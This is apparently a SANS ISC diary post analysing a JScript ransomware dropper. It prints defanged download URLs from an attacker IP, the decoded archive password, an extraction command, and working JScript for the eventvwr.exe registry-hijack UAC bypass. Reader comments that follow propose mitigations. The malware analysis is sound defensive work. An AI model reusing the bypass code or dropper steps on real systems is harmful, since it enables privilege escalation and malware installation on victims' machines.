My next class:

UAC Bypass in JScript Dropper

Published: 2016-12-13. Last Updated: 2016-12-14 19:46:25 UTC
by Xavier Mertens (Version: 1)
5 comment(s)

Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. It's always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from the different campaigns but always based on the same techniques.

The JScript code was, of course, obfuscated but it was easily read by a human. Usually, there is no need to implement complex obfuscation to bypass AV detection. This sample had a score of 8/54 on VT. What was different? First of all, it just tries to download two files from a remote server:

  • hxxp://45.58.49.54/7za.exe
  • hxxp://45.58.49.54/process.zip

The bad guy was lazy (or smart?) and did not implement complex encryption functions in his code. 7za.exe[1] is a clean file (42badc1d2f03a8b1e4875740d3d49336) used to extract two malicious PE files from the process.zip archive. This archive is protected by a password that is stored and obfuscated in the code. The obfuscation technique is simple: just based on strings of hexadecimal characters:

var AACRSODLXACCGDOLOSOX = LXCTAOHOHSYOAASHNDCA("6D696E617331303030");

This can be easily decoded with Python:

>>> '6D696E617331303030'.decode('hex')
'minas1000'

The destination path is generated via multiple variables and is finally set to "C:\Users\[user]\AppData\Local\", "user" being the victim's login. The archive is unzipped in this directory:

C:\Users\[user]\AppData\Local\7za.exe x C:\Users\[user]\AppData\Local\COCNOACTXATASGNOTOAS -pminas1000 -o C:\Users\[user]\AppData\Local\

Two new PE files are stored on the file system then executed:

  • processexplorerpe.exe (55c0548290a5dc43bc54a6a15ccd42fd) [2]
  • peprocesss.exe (6b96e8a9c13966086b1e2dd65ac84656) [3]

What makes this sample different? After the classic execution of the PE files, it tries to bypass the Windows UAC using a "feature" present in eventvwr.exe. This system tool runs as a high integrity process and uses HKCU / HKCR registry hives to start mmc.exe which opens finally eventvwr.msc. More information about this behaviour is available on the Microsoft website[4].

The trick is to create the registry entry that is checked by eventvwr.exe and to store the malicious binary ("ODASTATACOTSTAODHOOD" is the path to the malicious peprocess.exe):

var WshShell = WScript.CreateObject ("WScript.Shell");
WshShell.RegWrite ("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\", ODASTATACOTSTAODHOOD, "REG_SZ");

Once done, eventvwr.exe is started. It will read the registry and execute our sample which will run with high privileges:

var ZLGOZYLOLHONHTXTAOOR = environmentVars("WINDIR") + "\\SYSTEM32\\"+"eventvwr.exe";
AAOGAODYSCSTSOAOLHAC = new ActiveXObject("Wscript.Shell");
AAOGAODYSCSTSOAOLHAC.Run(ZLGOZYLOLHONHTXTAOOR, 1, 1);

Let's wait for the malware to accomplish its bad stuff and remove the registry entry:

WScript.Sleep(60000);
var wshShell = new ActiveXObject("WScript.Shell");
wshShell.Run("REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f");

More information about this technique to bypass UAC is available on github.com[5] with a PoC script in Powershell.

If you receive interesting samples, feel free to share them! We always need fresh meat!

[1] http://www.7-zip.org/download.html
[2] https://www.virustotal.com/en/file/305fe0e8e8753dd2bf79fd349760b5c83d75097becc98a541b489bd5456b7b5e/analysis/
[3] https://www.virustotal.com/en/file/7b1f0831ea6943fb1f2a2714f71b16c890baf15c985833e0a590fe6545c7e16f/analysis/
[4] https://msdn.microsoft.com/en-us/library/bb742441.aspx
[5] https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

5 comment(s)
My next class:

Comments

you *do* realize those exe links get rendered by rss readers and stuff don't you? please defang!
You're right, thank for the notification (mistake from my part)
Hopefully, they're not available (403 returned)
There are o-so-many ways to neuter these threats:

1. use Software Restriction Policies (either SRPv1 alias SAFER, or SRPv2 alias AppLocker) and allow execution only in %SystemRoot% and below as well as %ProgramFiles% and below

2. add the NTFS ACE "(D;OIIO;WP;;;WD)" to %USERPROFILE%, %ALLUSERSPROFILE% and %ProgramData%, meaning "deny execution of files in this directory and its subdirectories"

3. create the registry entry/entries
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"C:\\Windows\\System32\\EventVwr.Exe"="RunAsInvoker"
"C:\\Windows\\SysWoW64\\EventVwr.Exe"="RunAsInvoker"
"C:\\Windows\\Sysnative\\EventVwr.Exe"="RunAsInvoker"

...
SRP? Let me warn you all: SANDBOX_INERT!

https://msdn.microsoft.com/en-us/library/windows/desktop/aa446583%28v=vs.85%29.aspx
[quote=comment#38641]SRP? Let me warn you all: SANDBOX_INERT!

https://msdn.microsoft.com/en-us/library/windows/desktop/aa446583%28v=vs.85%29.aspx[/quote]

OUCH!
1. everybody NOT living under a rock for more than five years knows KB2532445!
2. before malware can call a Win32 API function with SANDBOX_INERT it must pass past SRP!

Diary Archives